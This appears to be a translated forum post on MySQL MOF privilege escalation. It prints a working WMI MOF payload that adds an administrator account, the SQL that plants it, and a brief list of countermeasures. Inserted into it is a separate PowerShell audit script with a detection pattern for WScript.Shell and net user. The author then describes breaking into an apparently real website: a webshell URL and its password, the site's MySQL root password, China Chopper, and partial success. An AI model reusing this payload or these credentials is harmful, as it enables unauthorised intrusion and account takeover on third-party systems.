Defending against the MySQL MOF extension vulnerability

Some exploit code published online:
#pragma namespace("\\\\.\\root\\subscription")

// Filter: fires on every Win32_LocalTime change whose Second == 5, i.e. once a minute
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

// Consumer: JScript that uses WScript.Shell to run net.exe and add a local user
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};

// Binding: ties the filter to the consumer, so the script runs as SYSTEM when the filter fires
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
After connecting to the MySQL database, run:

select load_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
From the code above, the countermeasures follow:

1. Control MySQL user privileges: deny the "load_file" and "dumpfile" functions and the like.

2. Disable the "WScript.Shell" component.

3. Directory permissions on c:/windows/system32/wbem/mof/: remove the built-in special group CREATOR OWNER.
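As an added example (not part of the original post), a PowerShell audit of the root\subscription namespace that the MOF above registers into: it reports every ActiveScriptEventConsumer whose script invokes WScript.Shell or adds users, together with the filter that triggers it, and removes the chain when run with -Remove. It assumes Windows PowerShell with WMI access; the pattern list is a constructed starting point.

```powershell
# Added example, not from the original post: audit the root\subscription namespace
# that the MOF above registers into, and report/remove script consumers that shell out.
param([switch]$Remove)

$ns = 'root\subscription'
# Constructed starting point: the WScript.Shell / net.exe pattern used by this page's payload.
$badScript = 'WScript\.Shell|net(\.exe)?\s+user|cmd(\.exe)?\s*/c'

$consumers = Get-WmiObject -Namespace $ns -Class ActiveScriptEventConsumer -ErrorAction SilentlyContinue
$bindings  = Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding -ErrorAction SilentlyContinue
$filters   = Get-WmiObject -Namespace $ns -Class __EventFilter -ErrorAction SilentlyContinue

foreach ($c in $consumers) {
    if ($c.ScriptText -notmatch $badScript) { continue }
    Write-Output ("SUSPICIOUS consumer '{0}' ({1}): {2}" -f $c.Name, $c.ScriptingEngine, $c.ScriptText)

    # Get-WmiObject returns the binding's Consumer/Filter as object-path strings,
    # e.g. ActiveScriptEventConsumer.Name="consPCSV2", so join on the Name key.
    $hits = $bindings | Where-Object { $_.Consumer -match ('Name="{0}"' -f [regex]::Escape($c.Name)) }
    foreach ($b in $hits) {
        $fName = ($b.Filter -split '"')[1]
        $f = $filters | Where-Object { $_.Name -eq $fName }
        Write-Output ("  bound to filter '{0}': {1}" -f $fName, $f.Query)
        if ($Remove) {
            # Drop the binding first so the consumer can no longer fire, then the filter.
            $b | Remove-WmiObject
            if ($f) { $f | Remove-WmiObject }
        }
    }
    if ($Remove) { $c | Remove-WmiObject }
}
```

Run it from an elevated prompt; without -Remove it only reports, which is the safer first pass on a host you are still triaging.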
Of course, the above is just what is said online. It seems to require very high privileges, such as root, plus remote MySQL access. I ran into exactly that yesterday, so let me demonstrate it for everyone.

Here is how it happened: a buddy asked a question on the forum, so I took a look and found that a guru had already taken it down, saying it was done with MySQL MOF extension privilege escalation.

But this newbie had never heard of it, so I hurried off to look up material and study it... which is where the content above, taken from the internet, came from.

Once I understood it, time to practice.

http://www.webbmw.com/config/config_ucenter.php, one-liner webshell, password a
$_config['db']['1']['dbhost'] = 'localhost';
$_config['db']['1']['dbuser'] = 'root';
$_config['db']['1']['dbpw'] = 'tfr226206';
$_config['db']['1']['dbcharset'] = 'gbk';
$_config['db']['1']['pconnect'] = '0';
$_config['db']['1']['dbname'] = 'webbmw';
$_config['db']['1']['tablepre'] = 'pre_';
$_config['db']['common']['slave_except_table'] = '';

There's the root password.
So I got straight to work with Caidao (China Chopper).

Upload the shell first.

Since we now have those accounts and such, let's run it...

A small note:

The first attempt here did not succeed; the reason is unknown.

I guessed that maybe the code we ran was the problem, so I went and got the code I had found on wooyun.
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user test test /add\")";
};

instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
I put the file at C:\WINDOWS\temp\1.mof

So we adjust the statement to execute accordingly:
-- backslashes doubled: MySQL treats a single backslash in a string literal as an escape character
select load_file('C:\\WINDOWS\\temp\\1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
But you will find the account still is not sitting there..

That was frustrating.

So I went and ran it against them one by one, and on the 2nd MySQL instance it succeeded...

But none of the other databases succeeded...

I am really puzzled; why exactly does it fail? Gurus, please explain...